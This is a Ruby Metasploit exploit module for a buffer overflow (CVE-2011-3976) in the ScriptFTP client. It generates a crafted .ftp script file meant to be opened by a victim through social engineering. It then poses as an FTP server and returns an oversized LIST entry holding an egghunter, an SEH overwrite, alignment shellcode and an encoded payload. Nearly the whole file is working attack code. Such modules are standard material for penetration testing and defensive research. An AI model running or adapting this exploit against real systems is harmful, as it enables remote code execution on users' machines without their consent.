Path: blob/master/modules/exploits/windows/ftp/scriptftp_list.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2011-3976 (ScriptFTP, versions 3.3 and earlier per the
# description below): a buffer overflow in the client's handling of a LIST
# response.
#
# The module plays two roles, each provided by one of the mixins below:
#   * FILEFORMAT - `setup` writes a ScriptFTP script (option FILENAME, default
#                  'msf.ftp') whose OPENHOST directive points at this module's
#                  own address, so opening the file connects back to it.
#   * FtpServer  - the module then acts as the FTP server and answers the
#                  client's LIST with an oversized directory entry.
#
# Defensive notes grounded in the code below: the LIST reply's filename field
# is padded past target['Offset'] (1746 bytes) and then extended further, and
# the generated script contains OPENHOST/GETLIST directives aimed at an outside
# host. Either is a usable detection indicator for this module's traffic.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::FtpServer
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Egghunter

  # Module metadata. Registers FILENAME, the name of the script file that
  # `setup` writes; everything else is framework bookkeeping (payload
  # constraints, the single target with its Offset/Ret pair, references).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ScriptFTP LIST Remote Buffer Overflow',
        'Description' => %q{
          AmmSoft's ScriptFTP client is susceptible to a remote buffer overflow
          vulnerability that is triggered when processing a sufficiently long
          filename during a FTP LIST command resulting in overwriting the
          exception handler. Social engineering of executing a specially crafted
          ftp file by double click will result in connecting to our malicious
          server and perform arbitrary code execution which allows the attacker to
          gain the same rights as the user running ScriptFTP. This vulnerability
          affects versions 3.3 and earlier.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'modpr0be', # Vulnerability discovery and original exploit
          'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
          'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2011-3976' ],
          [ 'OSVDB', '75633' ],
          [ 'EDB', '17876' ],
          [ 'US-CERT-VU', '440219' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
          'DisablePayloadHandler' => false
        },
        'Payload' => {
          'BadChars' => "\x00\xff\x0d\x5c\x2f\x0a",
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
          'EncoderOptions' =>
          {
            'BufferRegister' => 'EDI', # Egghunter jmp edi
          }
        },
        'Platform' => 'win',
        'Targets' => [
          # CALL DWORD PTR SS:[EBP-4]
          # scriptftp.exe - File version=Build 3/9/2009
          [ 'Windows XP SP3 / Windows Vista', { 'Offset' => 1746, 'Ret' => "\xd6\x41" } ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2011-10-12',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.ftp']),
      ]
    )
  end

  # Writes the ScriptFTP script file, then hands off to the FtpServer mixin.
  #
  # The script cannot usefully embed the wildcard address, so when SRVHOST is
  # 0.0.0.0 the host is taken from the local interface that would route to
  # 50.50.50.50 (Rex::Socket.source_address); otherwise SRVHOST is used as-is.
  # The script logs in as 'ftp'/'ftp', requests a remote file list and closes.
  # `super` is presumably what starts the listener — confirm in the mixin.
  def setup
    if datastore['SRVHOST'] == '0.0.0.0'
      lhost = Rex::Socket.source_address('50.50.50.50')
    else
      lhost = datastore['SRVHOST']
    end

    ftp_file = "OPENHOST('#{lhost}','ftp','ftp')\r\n"
    ftp_file << "SETPASSIVE(ENABLED)\r\n"
    ftp_file << "GETLIST($list,REMOTE_FILES)\r\n"
    ftp_file << "CLOSEHOST\r\n"

    print_status("Creating '#{datastore['FILENAME']}'...")
    file_create(ftp_file)
    super
  end

  # Replies with a bare "200 OK" to any FTP command that has no dedicated
  # handler, so the connecting client's negotiation proceeds whatever it
  # sends. `cmd` and `arg` are unused.
  def on_client_unknown_command(c, cmd, arg)
    c.put("200 OK\r\n")
  end

  # Handles the client's LIST: opens the data connection, sends both
  # control-channel replies (150 then 226) up front, and only then writes
  # the crafted directory listing to the data connection and closes it.
  #
  # NOTE(review): `if (not conn)` reads more idiomatically as `unless conn`,
  # and the trailing `return` is redundant.
  def on_client_command_list(c, arg)
    conn = establish_data_connection(c)
    if (not conn)
      c.put("425 Can't build data connection\r\n")
      return
    end

    print_status(" - Data connection set up")
    code = 150
    c.put("#{code} Here comes the directory listing.\r\n")

    code = 226
    c.put("#{code} Directory send ok.\r\n")

    eggoptions =
    {
      :checksum => false,
      :eggtag => 'cure'
    }

    hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)

    # Encode with alphamixed, then unicode mixed
    # (two sequential passes over `hunter`, each with its own BufferRegister)
    [ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|
      enc = framework.encoders.create(name)
      if name =~ /unicode/
        # aligned to ESP & EAX
        enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
      else
        enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })
      end
      # NOTE: we already eliminated badchars
      hunter = enc.encode(hunter, nil, nil, platform)
      if name =~ /alpha/
        # insert getpc_stub & align EDX, unicode encoder friendly.
        # Hardcoded stub is not an issue here because it gets encoded anyway
        getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"
        hunter = getpc_stub + hunter
      end
    }

    unicode_nop = "\x6d" # DD BYTE PTR DS:[ECX],AL

    nseh = "\x61" << unicode_nop
    seh = target.ret

    alignment = "\x54" # PUSH ESP
    alignment << unicode_nop
    alignment << "\x58" # POP EAX
    alignment << unicode_nop
    alignment << "\x05\x12\x11" # ADD EAX,11001200
    alignment << unicode_nop
    alignment << "\x2d\x01\x01" # SUB EAX,1000100
    alignment << unicode_nop
    alignment << "\x2d\x01\x10" # SUB EAX,10000100
    alignment << unicode_nop
    alignment << "\x50" # PUSH EAX
    alignment << unicode_nop
    alignment << "\xc3" # RETN

    # Filler is sized so that nseh lands exactly at target['Offset'].
    buffer = rand_text_alpha(656)
    buffer << hunter
    buffer << rand_text_alpha(target['Offset'] - buffer.length)
    buffer << nseh
    buffer << seh
    buffer << alignment
    buffer << rand_text_alpha(500)
    buffer << egg

    print_status(" - Sending directory list via data connection")
    # The oversized entry is sent twice, with one short entry between them.
    dirlist = "-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"
    dirlist << " 5 ftpuser ftpusers 512 Jul 26 2001 A\r\n"
    dirlist << "rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"

    conn.put(dirlist)
    conn.close
    return
  end
end